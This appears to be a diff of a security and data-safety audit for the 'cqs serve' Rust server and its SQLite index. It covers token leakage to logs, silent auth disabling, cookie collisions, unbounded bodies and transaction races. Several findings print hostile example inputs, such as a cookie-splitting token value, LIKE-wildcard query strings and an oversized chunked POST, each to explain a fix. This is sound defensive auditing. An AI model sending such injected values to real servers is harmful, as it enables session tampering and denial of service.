+- **Description:** The auth comment at `auth.rs:226-228` claims tokens never reach the structured log stream. The startup banner does write the token to stdout, intentionally, so a copy-paste from the operator's terminal lands in an authenticated session. But a long-running `cqs serve` deployed under systemd (`StandardOutput=journal`, the default) or via container (`docker run` capturing stdout into the container log driver) immediately persists the token banner into a log retention store the user never thinks about. The user's mental model is "the token only shows up in my terminal scrollback"; the reality is "anyone with `journalctl -u cqs-serve` (or the container log endpoint) can read the token until log rotation." Combined with that the token doesn't rotate during a long-lived launch, a 30-day-old banner is a 30-day-valid credential. Severity: low without a public binding (loopback only); medium with `--bind` to a LAN IP and any user on the box that has `journalctl -u`. Note: systemd `cqs-watch.service` already runs `cqs watch --serve`, not the HTTP server, but a future `cqs-serve.service` (or anyone wrapping `cqs serve` in systemd) inherits this trap silently.
+- **Suggested fix:** Two complementary mitigations: (1) print the token banner only to a controlling-tty-detected stderr (`atty::is(Stream::Stderr)`), or to a write-only file (`stdout` redirected to `/dev/null` when not interactive), so it doesn't leak to journald by default; (2) document in the listening banner that the token is per-launch and the user should rotate by restarting after disclosure. Optional: write the token to a `0o600`-permissioned file in `$XDG_RUNTIME_DIR` and print only the file path, with a `cqs serve token` subcommand that re-emits it on demand — same pattern Jupyter Lab uses since 2018.
 
-#### `build_graph` (uncapped) + `build_cluster` fetch entire chunks+function_calls tables with no server-side row limit — memory/DoS
+#### Auth state ignored by `quiet=true` callers — internal API lets tests build a router that omits auth without auditing
 - **Difficulty:** easy
-- **Location:** `src/serve/data.rs:232-234, 344-350, 833-861`, `src/serve/handlers.rs:96-119, 227-242`
-- **Description:** `/api/graph` with no `max_nodes` param (or `max_nodes=0` — still `Some`) runs `SELECT ... FROM chunks WHERE 1=1` with no LIMIT and pulls the full table into memory (data.rs:232-234), then fetches every row of `function_calls` (data.rs:344-350). `/api/cluster` (`build_cluster`) ignores `max_nodes` during the SQL fetch — it ALWAYS selects every chunk with non-null UMAP coords plus every edge, then truncates only after the full materialized Vec exists (data.rs:833-861, 909-919). On a 16k-chunk corpus with a few hundred thousand call edges that's hundreds of MB of serde_json allocations per request. No rate limiting, no concurrent-request cap, no body/time limit. Combined with the DNS-rebinding vector, a remote attacker can trigger this repeatedly. Even without rebinding, a local adversary can knock the server over by spamming `GET /api/cluster` and `GET /api/graph` with no params.
-- **Suggested fix:** (1) Require `max_nodes` (or force a hard default, e.g. min(requested, 10_000)) and push the truncation into SQL via `ORDER BY ... LIMIT`. (2) Add `tower::limit::ConcurrencyLimitLayer` and `tower_http::limit::RequestBodyLimitLayer` on the router. (3) Add `tower_http::timeout::TimeoutLayer` so a runaway query can't pin a worker forever. The graph capped path already does this correctly — apply the same SQL-LIMIT pattern in `build_cluster` and in the uncapped `build_graph` branch.
+- **Location:** `src/serve/mod.rs:78-83` (`run_server` signature accepts `auth: Option<AuthToken>`), `src/serve/mod.rs:154-178` (`build_router`)
+- **Description:** `run_server` and `build_router` both take `auth: Option<AuthToken>`. Passing `None` silently disables auth — there is no `AuthRequired` enum, no `Either<NoAuth, Auth>` type. The callsite in `cmd_serve` (`serve.rs:61-65`) correctly defaults to `Some(random())` and only opts into `None` on `--no-auth`, but the type signature does not constrain future internal callers (e.g. an embedded `cqs serve` for a doctor-style smoke test, an alternate CLI surface, or a feature-gated dev mode) from passing `None` and quietly disabling auth. There is no compile-time gate or runtime warning when the auth-disabled path is taken; the only signal is the `eprintln!` at `mod.rs:120-123`, which is only emitted when `quiet == false`. So a future `run_server(store, addr, true, None)` ships a fully open server with zero output — a regression that nothing in the type system catches. The pattern matters because the equivalent invariant in `cqs ref add` is enforced via type and validate-by-construction, but here the "default secure" property lives only in convention.
+- **Suggested fix:** Replace `Option<AuthToken>` with a `enum AuthMode { Required(AuthToken), Disabled { ack: NoAuthAcknowledgement } }` where `NoAuthAcknowledgement` is a `pub` zero-sized type only constructable inside `cmd_serve` after the `--no-auth` flag is parsed. Future internal callers physically cannot instantiate the disabled variant without intentionally importing the proof type. Alternative: keep `Option<AuthToken>` but add a `tracing::error!` (not warn) in the `None` branch of `build_router` so any test or future caller that disables auth shows up loudly in logs.
 
-#### `build_graph` + `build_hierarchy` IN-list can exceed SQLite 32k bind limit → 500 instead of graceful handling
-- **Difficulty:** easy
-- **Location:** `src/serve/data.rs:326-341` (graph edge fetch), `src/serve/data.rs:670-754` (hierarchy edge fetch)
-- **Description:** Both endpoints build `IN (?, ?, ?, ...)` dynamically from user-triggered BFS or node-set size and then bind every element twice. `build_graph`: binds = 2 × unique_names (edge SQL). `build_hierarchy`: binds = 2 × visited_names (edge SQL). SQLite's default `SQLITE_LIMIT_VARIABLE_NUMBER` is 32766; on a large corpus with `max_nodes=16001` or a deep/wide BFS expansion on a densely-connected function like `unwrap`, the bind count exceeds the limit and sqlx returns an error. The current code propagates the error to the client as `ServeError::Store` → 500. An attacker (or an agent passing `max_nodes=32000` because they didn't read the frontend cap) can trip this. On indexes with heavily-overloaded names (e.g. many `new` methods), it's trivially reachable.
-- **Suggested fix:** Chunk the IN-list across multiple queries and union the results in Rust, OR cap `max_nodes` in `handlers::graph` before it reaches `build_graph` (e.g. clamp to 10_000). For hierarchy, enforce a post-BFS `visited_names.truncate(MAX_HIERARCHY_NODES)` before building the edge IN-list. Same pattern used by `tests/eval_common.rs::batch_in_chunks` for deletes.
-
-#### `GraphQuery.file` filter passes raw user input through SQL `LIKE` — wildcard injection
-- **Difficulty:** easy
-- **Location:** `src/serve/data.rs:241-248`
-- **Description:** `build_graph` binds `format!("{file}%")` against SQL `LIKE ?`. The parameter is properly bound so it's not SQL injection, but `%` and `_` are LIKE metacharacters. A request with `?file=%sensitive%` matches anywhere the string "sensitive" occurs — not the prefix the API contract advertises. Similarly, `?file=_` matches any single-char file prefix. Not a high-severity vulnerability by itself (attacker only enumerates files they could discover via `/api/graph` anyway), but it breaks the API contract and may interact badly with future filters that trust the `file` parameter as a "safe prefix" — e.g. a future CSV export that uses the same filter to scope the response. The docstring says "file-path filter" implying a prefix; the behavior is "contains".
-- **Suggested fix:** Escape `%`, `_`, and the ESCAPE-character in the user-supplied `file` before interpolating: `let escaped = file.replace('\\', "\\\\").replace('%', "\\%").replace('_', "\\_"); binds.push(format!("{escaped}%"));` and add `ESCAPE '\\'` to the SQL: `AND c.origin LIKE ? ESCAPE '\\'`.
-
-#### `cmd_serve` spawns `xdg-open`/`open`/`explorer.exe` on a URL containing a user-supplied bind string — command-string injection surface
+#### `AuthToken::from_string` is `#[cfg(test)]` but exposed via `pub(crate)` — a future code path can construct a token with CR/LF and crash the server
 - **Difficulty:** hard
-- **Location:** `src/cli/commands/serve.rs:50-78`
-- **Description:** When `--open` is passed, `cmd_serve` builds `format!("http://{bind_addr}")` and invokes `std::process::Command::new(cmd).arg(url).spawn()`. `bind_addr` is the parsed `SocketAddr`, so direct shell metacharacters are rejected at parse time — but the URL still flows into `xdg-open`, which on Linux chains through `exo-open`/`gio-open`/the user's `xdg-mime` handler, and those downstream handlers have their own quirks (e.g. MIME handlers that forward the URL to a browser that does re-parsing). More concerning: `--bind` accepts `localhost` and `::1` as strings, and `cqs serve --bind localhost:evil --open` would produce `http://localhost:evil:<port>/` — the actual bind parse would fail first because `localhost:evil` isn't a valid socket address, but future refactors that accept hostname-style binds (e.g. accepting IPv6 with zone identifiers like `fe80::1%eth0`) could produce URLs with `%` / `/` characters that confuse downstream handlers. The zone-id case (`%eth0`) is particularly interesting because `%` is valid URL-encoded syntax.
-- **Suggested fix:** URL-encode or strictly allowlist the bind string before inserting it into the URL. Better: only ever open `http://127.0.0.1:<port>` or `http://[::1]:<port>` regardless of the actual bind (if `--bind 0.0.0.0` is passed with `--open`, the user still wants to visit their local browser pointing at localhost, not 0.0.0.0).
+- **Location:** `src/serve/auth.rs:75-78` (`from_string`), `src/serve/auth.rs:218-220` (`HeaderValue::from_str(&cookie).expect(…)`)
+- **Description:** `AuthToken::from_string` is gated on `#[cfg(test)]` so it's not callable from production code today. But the contract of `AuthToken` ("alphabet is URL-safe base64; HeaderValue construction infallible" — `auth.rs:215-218`) is enforced only by the docstring on `random()`, not by the type. If a future refactor lifts the cfg-gate (e.g. for a "fixed token from env var" feature, which is a reasonable ask for scripted automation that wants stable tokens across launches), an attacker who controls that env var can write `CR/LF` into the token and crash the worker on every redirect — `HeaderValue::from_str` rejects bytes that aren't valid HTTP header bytes, and the `.expect(…)` at line 218 panics. The crash is per-request (axum catches handler panics into a 500), so it's not a server-killer, but it's a guaranteed 500 for any request that hits the query-param redirect path. More subtly: a token containing `;` or `,` would split the cookie syntax and let an attacker who knows the format inject a second cookie pair, e.g. token = `validbase64; admin=true; ` — then on the redirect `Set-Cookie: cqs_token=validbase64; admin=true; ; Path=/; HttpOnly; SameSite=Strict`. The cookie would be malformed and most browsers would reject the whole header, but the principle of "only ever construct a HeaderValue from validated bytes" is broken.
+- **Suggested fix:** Make the alphabet a structural property of `AuthToken`: have `random()` return `AuthToken(String)` where the wrapped string is verified at construction time to be `[A-Za-z0-9_-]+` and panic on construction (not on use) if it's not. For `from_string`, do the same validation; tests that want to build a deterministic token still get one, but they cannot smuggle invalid bytes in. With the alphabet enforced at the type level, the `.expect(…)` at `auth.rs:218` becomes a real safety proof rather than a fragile docstring.
 
-#### `cqs serve` has no authentication — default stance relies entirely on "localhost is trusted"
-- **Difficulty:** hard
-- **Location:** `src/serve/mod.rs:97-114`, `src/cli/commands/serve.rs:20-30`
-- **Description:** There is no token, cookie, or per-session check on any endpoint. The `--bind 0.0.0.0` warning at `src/cli/commands/serve.rs:24-29` is cosmetic — it prints to stderr but still starts the server open to the network. Agents / operators who see the warning in a log tail later have no runtime defense; the server keeps serving unauthenticated requests forever. Every other local-first dev server that's even vaguely exposed (VS Code live preview, Jupyter, rust-analyzer) at least binds a per-process random token. Also: no TLS, so even the localhost-only posture is vulnerable to any user on the same box (multi-user workstations, shared CI runners, ill-gotten local container escapes) reading the entire index including source content via `/api/chunk/:id`.
-- **Suggested fix:** Generate a per-launch random token in `cmd_serve`, print it in the "listening on ..." banner as `http://127.0.0.1:8080/?token=<hex>`, require it on every `/api/*` request (either query param or `X-Cqs-Token` header). Hashed-compare so a timing attack can't recover bytes. Optionally short-lived session cookie set by the token-carrying first request.
-
-#### LIKE injection in `build_chunk_detail` "tests-that-cover" heuristic — user-controlled name used in LIKE without escaping
+#### `cqs serve` request body is unbounded — POST or chunked uploads can exhaust memory; no `RequestBodyLimitLayer`
 - **Difficulty:** easy
-- **Location:** `src/serve/data.rs:533-541`
-- **Description:** The tests heuristic binds `format!("%{name}%")` where `name` is the chunk's stored name from the database. Stored names originate from parsed source — an adversary who indexed their hostile project into cqs (e.g., via `cqs ref add` pointing at attacker-controlled code) can create a function named something like `_%` or `%_%`. When a downstream user clicks that chunk in the UI, the server executes `content LIKE '%_%%'` which matches far more rows than intended, returning up to 20 unrelated "test" chunks. That's a denial-of-accuracy: the UI's "tests that cover" panel is populated with junk. On a very large index, a name of `_%` would match essentially every test chunk, forcing a full table scan and slowing the endpoint. Paired with concurrent requests (see DoS finding) an attacker could grind the daemon down.
-- **Suggested fix:** Escape LIKE metacharacters in `name` the same way as the `file_filter` fix above (`% → \%`, `_ → \_`), append `ESCAPE '\\'`. Better: switch the heuristic to FTS5 (exact token match against `chunks_fts` like `search_by_name` already does) — the current LIKE-based heuristic is O(n) table scan anyway.
+- **Location:** `src/serve/mod.rs:154-196` (`build_router` — no body-limit layer in the chain)
+- **Description:** The router declares only `GET` routes (`routes.rs:160-168`), and axum returns 405 for non-GET on those routes. But axum still BUFFERS the request body before dispatching — and for a route declared as `get(...)`, axum 0.7 reads the body into memory before deciding to 405. There's no `tower_http::limit::RequestBodyLimitLayer` in the chain. So an attacker (after passing host + auth) can `POST /api/stats` with `Content-Length: 99999999999` and `Transfer-Encoding: chunked`, and axum will buffer up to the OS-level read limit before responding 405. With the auth layer running *outside* the body read, the 405 path can be reached by any authenticated client. Memory pressure proportional to body size, repeated forever. Since auth is in front, an external attacker without a token can't do this — but a multi-user box where one user has the token (per the `journald` finding above) can. Also: for the GET-only routes that DO expect query strings (e.g. `/api/search?q=…`), there is no `Content-Length` cap on the body that some clients might send anyway. axum forgivingly ignores the body for GET, but not before reading it into memory.
+- **Suggested fix:** Add `RequestBodyLimitLayer::new(64 * 1024)` to the layer chain (sits inside CompressionLayer, outside auth so the limit applies to even rejected requests). 64 KiB is plenty for query strings and cookies; legitimate clients never approach it. Tower-http already has the layer; no new dep.
+
+#### `Path=/` cookie scope plus 127.0.0.1 sharing — multiple `cqs serve` instances on the same host share cookies and can hijack each other
+- **Difficulty:** hard
+- **Location:** `src/serve/auth.rs:211-214` (`Set-Cookie: cqs_token={token}; Path=/; HttpOnly; SameSite=Strict`)
+- **Description:** Two `cqs serve` instances on the same machine, on different ports (e.g. project A on 8080, project B on 8081), both share the same cookie origin from the browser's perspective: cookies on `localhost`/`127.0.0.1` are scoped by host but NOT by port. Both servers set `cqs_token=...` with `Path=/`. A user authenticates to project A, gets cookie `cqs_token=A_TOKEN`. They later visit `http://127.0.0.1:8081/?token=B_TOKEN` for project B. The redirect sets `cqs_token=B_TOKEN`, OVERWRITING the project A cookie in the browser jar (same name + host + path). Now the user's tab on project A is silently logged out and (worse) any link they click through to project A sends `cqs_token=B_TOKEN`, which fails ct_eq and 401s. Browsers do scope cookies by `Path=/` but not by port, so this is a fundamental browser-cookie limitation, not a server bug. It's still a real footgun for any user running two `cqs serve` instances, plus a downgrade vector: an attacker who can make the user visit their own attacker-controlled `cqs serve` on a port they control — say, by phishing the user into running `cqs serve --bind 127.0.0.1 --port 8081` against a malicious project — replaces the legitimate project's cookie. Combined with SameSite=Strict-bypass via top-level navigation (the user *is* navigating top-level), the attacker can drop any cookie they like into the victim's localhost cookie jar. Mitigation note: the comment at `auth.rs:42-47` ("Pinned to `cqs_token` so a future second-server instance running in another tab on the same host uses a different cookie path") explicitly acknowledges the issue but does not actually solve it.
+- **Suggested fix:** Use `__Host-` cookie prefix (`__Host-cqs_token`) per RFC 6265bis — requires `Path=/`, `Secure`, and forbids `Domain`. The `Secure` requirement means the cookie won't stick on plain HTTP, which is a problem for localhost. Alternative: include the bind port in the cookie name (`cqs_token_8080`) so two instances don't collide. Best alternative: set `Path=/api/__cqs_<port>/` and have the auth layer rewrite the request path — heavy. Pragmatic: set the cookie name from a hash of `(bind_addr, launch_time)` so two instances don't collide and a new launch invalidates the old cookie automatically. The knob count rises but the multi-instance footgun goes away.
 
 ## One-line summary
 
-Found eight security issues, all in the new `cqs serve` surface: DNS-rebinding exfiltration (no Host check + no CORS), two reflected-XSS paths via `innerHTML = body.slice()` in hierarchy-3d and cluster-3d views, two DoS-class issues (unbounded SQL + IN-list bind overflow), one LIKE-wildcard injection in the `file` graph filter, one LIKE injection in the chunk-detail "tests" heuristic, plus unauthenticated serve and an `xdg-open` URL-interpolation hazard.
+Eight new findings on top of SEC-1 … SEC-8 (already triaged). All are in the v1.30.0 auth surface (#1118): TraceLayer leaks the token via URI logging despite the careful HttpOnly/redirect handoff; missing-Host requests bypass DNS-rebinding protection; `--bind 0.0.0.0` is broken in a way that pushes operators to `--no-auth`; the launch banner persists tokens to journald for log-retention lifetime; `Option<AuthToken>` permits silently building a no-auth router; `from_string` is cfg-gated but the alphabet invariant relies on a docstring rather than a type; no request-body-limit layer; cookies aren't port-scoped on localhost so two instances stomp each other.
 
----
 
 ## Data Safety
 
-#### DS2-1: `prune_missing` reads origin list OUTSIDE write transaction — same TOCTOU that P2 #32 closed for `prune_all`
-- **Difficulty:** easy
-- **Location:** `src/store/chunks/staleness.rs:76-90`
-- **Description:** The previous audit closed the Phase 1 / Phase 2 race in `prune_all` by moving the `SELECT DISTINCT origin FROM chunks` inside the `begin_write()` transaction. `prune_missing` still does the reverse: it fetches `rows` from `&self.pool` at line 76, computes `missing` from that snapshot, and only *then* calls `begin_write()` at line 102. During the gap `cqs watch` (which only holds `try_acquire_index_lock`, not the DB `WRITE_LOCK`) can call `upsert_chunks_and_calls` for a freshly-added file. That file is missing from the caller-supplied `existing_files` snapshot but present in `chunks`; the Phase 2 DELETE will wipe the just-added rows. `prune_missing` is called by both the daemon startup GC (`cli/watch.rs:944`) and the periodic GC (`cli/watch.rs:1026`), so the window is reachable every time either fires.
-- **Suggested fix:** Move the `SELECT DISTINCT origin FROM chunks` call inside the `begin_write()` transaction (swap the order at line 75 and 102). Mirror the `prune_all` layout exactly — take the write lock first, then fetch distinct origins from `&mut *tx` so the DELETE operates on the same snapshot the read observed.
-
-#### DS2-2: `prune_gitignored` reads origin list OUTSIDE write transaction — same class as DS2-1
-- **Difficulty:** easy
-- **Location:** `src/store/chunks/staleness.rs:333-337`
-- **Description:** `prune_gitignored` (called on every daemon startup via `run_daemon_startup_gc` and every 30 min via `run_daemon_periodic_gc`) runs `SELECT DISTINCT origin FROM chunks` on `&self.pool` outside a transaction (line 336), then later opens `begin_write` at line 374 and does batched DELETEs. If `cqs watch`'s reindex commits between the two phases for a newly-gitignored path (rare but possible via staged .gitignore edits), the delete set reflects the stale Phase-1 snapshot and a just-written chunk survives the prune — or, more consequentially, a chunk whose matcher result changed in the gap gets deleted even though its `chunks` row was refreshed in the interim. The function comment at line 331 even acknowledges "Rust-side filter, outside tx so the matcher walk doesn't hold the write lock" as if the hazard were a deliberate trade — but the matcher walk is microseconds on ~10k origins, not a meaningful lock hold.
-- **Suggested fix:** Open the `begin_write` transaction first and issue the `SELECT DISTINCT origin` against `&mut *tx` (as `prune_all` now does). The matcher walk then proceeds inside the tx — trivial cost compared to the DELETE phase that already runs there.
-
-#### DS2-3: `set_metadata_opt` and `touch_updated_at` bypass `WRITE_LOCK` — torn-write race against `begin_write()` transactions
-- **Difficulty:** easy
-- **Location:** `src/store/metadata.rs:409-418` (`touch_updated_at`), `:452-475` (`set_metadata_opt`)
-- **Description:** `set_hnsw_dirty` at line 436-449 correctly uses `begin_write()` (added by DS-V1.25-3) to serialize against every other in-process writer. The sibling functions `touch_updated_at` and `set_metadata_opt` still execute raw pool writes: `sqlx::query(...).execute(&self.pool)` with no `WRITE_LOCK` guard. Two in-process writers — e.g. the daemon's watch loop calling `touch_updated_at()` at `cli/watch.rs:2590` and the pipeline path simultaneously running `upsert_chunks_and_calls` — can both have deferred transactions open, and SQLite returns `SQLITE_BUSY` when one of them tries to upgrade to exclusive. `WRITE_LOCK` was added specifically to prevent this — `set_metadata_opt` is called by pending-batch ID setters (`set_pending_batch_id`, `set_pending_doc_batch_id`, `set_pending_hyde_batch_id`) used by long-running LLM batch polling, which are exactly the paths where a concurrent reindex is likely.
-- **Suggested fix:** Rewrap both in `let (_guard, mut tx) = self.begin_write().await?` + execute against `&mut *tx` + `tx.commit()`. Same pattern as `set_hnsw_dirty`. The write is a one-statement UPSERT/DELETE, so the transactional overhead is negligible, and the invariant "every in-process mutation takes WRITE_LOCK" becomes structural instead of "call the right setter."
-
-#### DS2-4: Phantom-chunks DELETE is in a separate transaction from the chunk upsert that precedes it — mid-batch crash leaves the index inconsistent with disk
+#### Migration restore_from_backup overwrites live DB while pool holds open connections
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:2568-2579`
-- **Description:** For each file in the watch cycle, the loop runs `store.upsert_chunks_and_calls(pairs, ...)?` followed by `store.delete_phantom_chunks(file, &live_ids)?` — each in its own independent write transaction. The source code comment at line 2574-2577 explicitly acknowledges "Ideally this would share a transaction with `upsert_chunks_and_calls`, but both methods manage their own internal transactions. A crash between the two leaves phantoms that get cleaned on the next reindex." This is hand-waved as tolerable because the next reindex will clean it, but there's a worse class of failure mode: if the daemon crashes between the upsert (which marks `hnsw_dirty=1` at `watch.rs:2179`) and any subsequent HNSW rebuild — a long window on large batches — the HNSW has been flagged dirty but phantoms still exist and will match search queries against IDs that are about to be deleted. The `hnsw_dirty` flag is only cleared after a full rebuild following the final file; if the process is SIGKILLed mid-batch, we serve queries against a half-pruned index for the next daemon boot until the first event triggers a rebuild.
-- **Suggested fix:** Extend `upsert_chunks_and_calls` to accept a `live_ids: Option<&[&str]>` argument that, when present, performs the phantom delete inside the same tx — mirroring how `prune_all` does four logical operations in one transaction. Alternative: add a single `upsert_file_chunks(file, chunks_with_embeddings, calls, live_ids)` that wraps the whole per-file delta in one BEGIN/COMMIT, and let `cli/watch.rs:2538-2580` call it per file instead of the two-step dance.
+- **Location:** `src/store/backup.rs:171-180` (called from `src/store/migrations.rs:106-128`)
+- **Description:** When a migration step fails, `migrate()` calls `restore_from_backup(db_path, bak)` which invokes `copy_triplet` → `copy_file_atomic` → `crate::fs::atomic_replace` to rename the backup over the live `db_path`. But the SQLite `pool` from `migrate()`'s caller is STILL holding open file descriptors against the old inode. After the atomic_replace, `db_path`'s inode is the backup's; existing connections in the pool see the *unlinked old* inode, while any subsequent open via the same path sees the new one. Worse, the loop then copies `-wal` and `-shm` over what the pool's open connections believe are *their* sidecars — but those copies land on the new inode while the pool's mapped sidecars (mmap'd) belong to the old inode. The result is silent two-state divergence: in-process queries can read stale rows from the old WAL while readers from new processes see the restored DB. SQLite's documented restore pattern requires closing all connections first (or using the online backup API). Tests in `src/store/migrations.rs:tests` use a fresh temp DB and a single transaction, so the divergence never surfaces. In production a daemon already has a long-lived `Store::open(...)` that owns the pool; if a fresh CLI invocation triggers a migration and fails on a buggy step, the daemon then serves queries from a phantom inode.
+- **Suggested fix:** Drop / close the pool before calling `restore_from_backup` (e.g. take `pool` by value, `.close().await`, then run the restore, then re-open). At minimum, `PRAGMA wal_checkpoint(TRUNCATE)` and force a connection close on every pooled connection before the file replace; document that callers must hold no other Store handles to `db_path` during the restore.
 
-#### DS2-5: `EmbeddingCache::evict` is TOCTOU — SELECT size / AVG runs on pool, DELETE runs on pool — concurrent writers invalidate the eviction decision
+#### `stream_summary_writer` bypasses `WRITE_LOCK` — concurrent writer can collide with reindex
+- **Status:** RESOLVED in #1126 PR (write-coalescing queue + `Store::flush_pending_summaries` API).
+- **Difficulty:** medium
+- **Location:** `src/store/chunks/crud.rs:504-545` (pre-fix); now `src/store/summary_queue.rs` + `src/store/chunks/crud.rs`.
+- **Description:** Every other write path in `Store<ReadWrite>` acquires the in-process `WRITE_LOCK` mutex via `begin_write()`. `stream_summary_writer` instead executes `INSERT OR IGNORE INTO llm_summaries ...` directly against `&self.pool` from a captured `Arc<SqlitePool>` callback that fires from LLM provider streaming threads. Two concrete races:
+  1. A background `cqs llm summary` (or `--improve-docs`) batch is streaming results while the user runs `cqs index` on the same project. The streaming write and `upsert_chunks_and_calls` both contend for SQLite's exclusive lock without the in-process serialization that `WRITE_LOCK` provides. With WAL mode and `busy_timeout=5s` either side can SQLITE_BUSY and abort.
+  2. Multiple in-flight LLM streams (Haiku + doc-comments + hyde concurrently) each fire INSERT OR IGNORE per item; without `begin_write()`, sqlx auto-wraps each statement in its own implicit transaction and commits it individually. That's 1 fsync per row instead of one per batch — already a perf bug, but the data-safety angle is that if the process is killed mid-stream, the partial writes are visible to readers immediately (no transactional grouping).
+- **Resolution:** Added a per-`Store<ReadWrite>` `PendingSummaryQueue` (`src/store/summary_queue.rs`). The streaming callback now enqueues into the queue; the queue flushes synchronously when either the row threshold (default 64) or the time interval (default 200 ms) is crossed, OR when callers (LLM passes, `cmd_index`) call `Store::flush_pending_summaries` explicitly. Flushes drain every queued row inside one `WRITE_LOCK`-guarded transaction with a single multi-row `INSERT OR IGNORE`, restoring the invariant that all `index.db` writes serialize through the same in-process mutex. See `docs/design/1126-1127-lock-topology.md` for the full design rationale.
+
+#### Chunk content change does not invalidate `umap_x` / `umap_y` — cluster view serves stale positions
 - **Difficulty:** easy
-- **Location:** `src/cache.rs:352-400`
-- **Description:** `evict()` queries `SELECT SUM(LENGTH) + COUNT*200 FROM embedding_cache`, then `SELECT AVG(LENGTH + 200)`, then `DELETE WHERE rowid IN (SELECT ... LIMIT ?)` — all three on `&self.pool`, each in its own implicit transaction. Between the size measurement and the DELETE, a concurrent `write_batch` (which uses `pool.begin()` with no shared lock; the cache has its own pool and no cross-call WRITE_LOCK equivalent) could add 10+ MB of entries; the computed `entries_to_delete` is then wrong, and we evict based on a stale snapshot. Under the daemon's periodic-evict-while-writing pattern this is the hot path: evict runs alongside `write_batch` in the same tokio runtime. Worse, two `evict()` calls from different threads can both decide to delete from the same `LIMIT ?1` prefix — the `ORDER BY created_at ASC` makes the deletes overlap and each caller's `rows_affected()` count is larger than the per-call contribution. `QueryCache::evict` at `:1103-1147` has the identical shape and the identical bug.
-- **Suggested fix:** Wrap all three SELECTs + the DELETE in a single `pool.begin()` transaction so the size measurement, AVG computation, and DELETE see one consistent snapshot. Add an in-process `Mutex<()>` guard (either on the `EmbeddingCache` struct or a process-global like SQLite's `WRITE_LOCK`) so two evicts can't race at all. Since `evict()` is idempotent to some extent, this is low-risk — but the mis-accounting currently shows up as "evicted more than needed" ratchets during parallel reindex loops.
+- **Location:** `src/store/chunks/async_helpers.rs:339-362` (UPSERT) + `src/cli/commands/index/umap.rs:38-228`
+- **Description:** v22 added nullable `umap_x`/`umap_y` columns; `cqs index --umap` runs a UMAP projection over current embeddings and writes coords back via `update_umap_coords_batch`. The `cqs serve` cluster view at `src/serve/data.rs:920-1003` reads these coords directly. Problem: the chunk UPSERT in `batch_insert_chunks` lists every column it overwrites on conflict — embedding, embedding_base, parser_version, etc. — but it does NOT touch `umap_x` or `umap_y`. So when content changes (`WHERE chunks.content_hash != excluded.content_hash`), the embedding gets refreshed but the UMAP coords stay frozen. The cluster view then displays the chunk at a position computed from the old embedding, potentially landing it in a wrong cluster (e.g. function rewritten end-to-end keeps its old coords until the user remembers to run `cqs index --umap`). Worse, `cqs serve` has no way to surface the staleness — the `umap_x IS NOT NULL` filter only catches the all-NULL case. Memory rule: invalidation counters / staleness must be enforced at the schema layer; relying on the user to re-run `--umap` is exactly the call-site instrumentation pattern the project explicitly rejected.
+- **Suggested fix:** Add `umap_x = NULL, umap_y = NULL` to the ON CONFLICT UPDATE clause when content_hash differs. The cluster view's `IS NOT NULL` filter then correctly reports "needs reprojection." Optionally add a metadata `umap_generation` counter that bumps on chunks delete/insert (mirroring `splade_generation`) so a future `cqs serve` warning can fire when generation > umap_generation_at_projection.
 
-#### DS2-6: HNSW save's `.bak` rename sequence writes `.bak` without fsync before `atomic_replace` — power cut between step-3 rename and step-4 atomic_replace can lose the directory entry
-- **Difficulty:** medium
-- **Location:** `src/hnsw/persist.rs:414-426` (backup rename) + `:429-461` (atomic_replace)
-- **Description:** Save sequence: (1) build temp_dir with new files + checksums; (2) acquire lock; (3) for each ext, `std::fs::rename(final, bak)` at line 418 — plain `rename`, no fsync of the parent dir after; (4) for each ext, `atomic_replace(temp, final)` which does fsync the parent. Between step 3 and step 4, the parent directory's rename-to-`.bak` entries are NOT fsynced. On a power cut with ext4's default `data=ordered` we're likely fine because journal ordering commits the rename entry before subsequent writes — but the exact guarantee depends on the filesystem. If step 4 fails after step 3 completed, rollback path at line 465-487 tries `std::fs::rename(bak, final)` to restore — again no fsync on the restore rename, and no fsync of the parent dir after the rollback completes. A second power cut during rollback can leave the index with missing files even though the .bak existed on disk. The intermediate window is small but real: a multi-file rollback (graph + data + ids + checksum) takes multiple rename syscalls.
-- **Suggested fix:** After the back-up loop at line 418-425 but before the atomic_replace loop, open the parent `dir` and call `sync_all()` once. Same at the end of the rollback restore loop at line 471-483. A single fsync amortized across 4 renames is negligible overhead compared to the HNSW save's cost (which is dominated by graph+data writes, hundreds of MB). The `atomic_replace` helper already does this for its own pass; the backup pre-pass just needs the same treatment.
-
-#### DS2-7: HNSW incremental insert + save is not atomic against the `hnsw_dirty` metadata flag — crash leaves `dirty=1` permanently even though the on-disk file was fully written
-- **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:2326-2338` (incremental save + clear-dirty), `:2250-2257` (full rebuild + clear-dirty)
-- **Description:** Both the incremental and the full-rebuild branches clear `hnsw_dirty` only AFTER `index.save(...)` succeeds. If the save itself succeeds but `set_hnsw_dirty(Enriched, false)` fails (transient SQLITE_BUSY, daemon read-only mode racing with a manual `index --force`, etc.) we log a warning and continue. Now the on-disk HNSW is actually fresh but the metadata says "dirty," so every subsequent reopen of the Store at `src/cli/store.rs:289` will see `is_hnsw_dirty() == true` and rebuild from scratch — paying 10s-1m of full-graph-rebuild cost per daemon restart. More importantly, in the reverse ordering (`watch.rs:2179-2186`) the flag is set to `dirty=1` before the chunks write, then the write happens, then we try to clear. If the process is SIGKILLed between the chunks commit and the HNSW save, the next daemon load sees dirty + stale HNSW and correctly rebuilds — that path is safe. It's the "save succeeded but clear-dirty failed" path that is unrecoverable without a manual reindex.
-- **Suggested fix:** The clear-dirty is a single metadata UPDATE; if it returns an error, retry once (with `begin_write` retry semantics) before giving up. Alternatively, expose `set_hnsw_dirty_after_save(...)` that reads the on-disk checksum and only reports "dirty" if checksum mismatches actual file — moving the invariant from metadata-must-agree-with-filesystem to filesystem-is-source-of-truth. Simpler fix: tie the clear-dirty to a blake3 of the saved files; on reopen, if the blake3 matches the stored value, treat as clean regardless of the dirty flag. That turns the dirty flag into an optimization rather than a correctness requirement.
-
-#### DS2-8: `v18→v19` migration drops orphan sparse_vectors rows WITHOUT updating schema_version in the same transaction — rollback on error leaves half-migrated state (prior to P1 #16 UPSERT fix)
-- **Difficulty:** medium (but may already be mitigated by backup-restore path)
-- **Location:** `src/store/migrations.rs:478-562` (`migrate_v18_to_v19`) + `:197-203` (UPSERT of schema_version)
